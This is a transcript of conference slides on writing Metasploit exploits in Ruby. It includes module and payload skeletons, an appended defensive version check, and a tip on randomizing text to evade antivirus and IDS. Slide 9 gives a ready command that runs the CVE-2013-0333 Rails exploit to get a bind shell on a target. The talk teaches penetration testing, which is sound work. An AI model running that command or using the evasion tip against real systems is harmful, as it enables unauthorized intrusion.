
Pelting Rubies


Slides from the talk given by me at RubyConf India 2013 on using the Metasploit Framework for penetration testing and exploit development.


Transcript

  1. Metasploit Interfaces
     • msfcli
       ◦ command-line interface to MSF
       ◦ provides options to Check, Execute, list Payloads, describe exploits
       ◦ useful for testing when writing an exploit
     • msfconsole
       ◦ access to virtually all options available in MSF
       ◦ console-based interface
       ◦ supports tabbed command completion, uses ruby Readline
       ◦ can even run external commands
     • meterpreter
       ◦ dynamically extensible payload
       ◦ runs in-memory
  2. Ruby EXtension Library
     • utilities to help writing exploits
     • Rex::Arch - assembly instructions on the fly with variable operands, such as immediate values, registers, and so on
       ◦ Rex::Arch.pack - Integer packing, big/little endian
       ◦ Rex::Arch.adjust - Adjusting the stack pointer
       ◦ Rex::Arch::X86 - Generating jmp, call, push, mov, add, and sub
     • Rex::Exploitation - provides some common operations required by various exploits
     • Rex::Encoding - basic encoders
  3. Ruby EXtension Library (contd.)
     • Rex::JobContainer - organising your exploit code into jobs
     • Rex::Logging
     • Rex::Sync - Sync. primitives like notify/wait
     • Rex::Ui - helpers for different user interfaces
     • Rex::Post - post-exploitation tools useful in providing a generic interface to the exploited system
     • Rex::Proto - support for HTTP, SMB, NTLM
     • Rex::Services - access via listeners to various services which can be reused across exploits
     • Rex::Socket - TCP, SSL, IP
  4. Scanning, Sniffing, Fuzzing
     • Port scanning
       ◦ Nmap
       ◦ Metasploit scanning module
     • Other scanners in auxiliary/scanner
       ◦ auxiliary/scanner/ssh/ssh_version
     • Password sniffing - psnuffle
     • auxiliary/fuzzers
     • using exploits with the check() method
  5. Writing an exploit
     • Let the framework do whatever it can
     • use the Rex protocol libs
     • use mixins
       ◦ Exploit::Remote::Tcp - RHOST, RPORT, connect()
       ◦ Exploit::Remote::SMB - SMBPASS, smb_login()
       ◦ Exploit::Remote::BruteTargets - brute_exploit(), brute force utilities
     • use randomizations wherever possible
       ◦ Rex::Text.rand_text_alpha
       ◦ Rex::Text.rand_text_alphanumeric
       ◦ Helps in AV and IDS evasion
  6. Structure of an exploit

         require 'msf/core'   # loads the Msf::Exploit::Remote base class and mixins

         class Metasploit3 < Msf::Exploit::Remote
           # TCP mixin (the same Exploit::Remote::Tcp named on slide 5): gives RHOST, RPORT, connect()
           include Msf::Exploit::Remote::Tcp

           def initialize
             super(
               'Name'    => 'Exploit Name',
               'Payload' => {'BadChars' => "\x00"}
             )
             register_options([ Opt::RPORT(12345) ], self.class)
           end

           def exploit
             connect()                 # opens the socket to RHOST:RPORT
             sock.put(payload.encoded) # sends the encoded payload over it
             ...
           end
         end
  7. Using the check() method

         def check
           # fetch the version etc.
           case version
           when "2.3.0"
             return Exploit::CheckCode::Vulnerable
           when "2.3.6"
             return Exploit::CheckCode::Detected
           else
             print_status('Unable to detect version')
             return Exploit::CheckCode::Safe
           end
           return Exploit::CheckCode::Safe # never reached: every branch above already returns
         end
  8. Payloads

         module Metasploit3
           include Msf::Payload::Single
           include Msf::Payload::Ruby

           def initialize(info = {})
             super(merge_info(info,
               'Name'        => 'Bind TCP',
               'PayloadType' => 'ruby'))
           end

           def generate
             return prepends(ruby_string)
           end

           def ruby_string
             "" # some malicious ruby code
           end
         end
  9. ROR JSON Vuln. (CVE-2013-0333)
     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0333
     Vulnerability in RoR 2.3.x before 2.3.16 and 3.0.x before 3.0.20 in the way Active Support performed the parsing of JSON requests by translating them to YAML. The exploit in Metasploit provides a shell which can be used to run arbitrary commands on the compromised system.
     /opt/metasploit/apps/pro/msf3/modules/exploit/multi/http/rails_json_yaml_code_exec
     http://www.exploit-db.com/exploits/24434/

         msfcli exploit/multi/http/rails_json_yaml_code_exec RHOST=victim RPORT=3000 PAYLOAD=ruby/shell_bind_tcp E
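As an added example (not from the talk or from the Metasploit project), the check() decision of slide 7 carried through for the affected ranges slide 9 gives for CVE-2013-0333: a stand-alone Ruby check that classifies a Rails version banner. Exploit::CheckCode is a stub so the file runs without Metasploit loaded; extract_version, AFFECTED and the sample banners are assumptions of this example.

```ruby
# Added example: version-range check in the style of slide 7, using the
# CVE-2013-0333 ranges from slide 9. Exploit::CheckCode is stubbed here so the
# file runs without Metasploit; a real module gets it from Msf::Exploit::CheckCode.
module Exploit
  module CheckCode
    Vulnerable = :vulnerable
    Safe       = :safe
    Unknown    = :unknown
  end
end

# Affected branches and their first fixed release (slide 9):
# 2.3.x before 2.3.16 and 3.0.x before 3.0.20.
AFFECTED = {
  '2.3' => Gem::Version.new('2.3.16'),
  '3.0' => Gem::Version.new('3.0.20'),
}.freeze

# Pull a dotted version out of a banner such as "Rails 2.3.14";
# returns nil when no version is present.
def extract_version(banner)
  m = banner.to_s.match(/\b(\d+\.\d+\.\d+)\b/)
  m && Gem::Version.new(m[1])
end

# Vulnerable inside an affected branch below its fixed release, Safe on a
# fixed release or an unaffected branch, Unknown when no version was parsed.
def check(banner)
  version = extract_version(banner)
  return Exploit::CheckCode::Unknown unless version

  branch = version.segments[0, 2].join('.')
  fixed  = AFFECTED[branch]
  return Exploit::CheckCode::Safe unless fixed

  version < fixed ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample banners, not captured output.
  ['Rails 2.3.14', 'Rails 2.3.16', 'Rails 3.0.19', 'Rails 3.2.11', 'no version'].each do |b|
    puts "#{b.ljust(14)} => #{check(b)}"
  end
end
```

Unlike the slide 7 snippet, an unparsable banner yields Unknown rather than Safe, so a failed detection is not reported as a clean host.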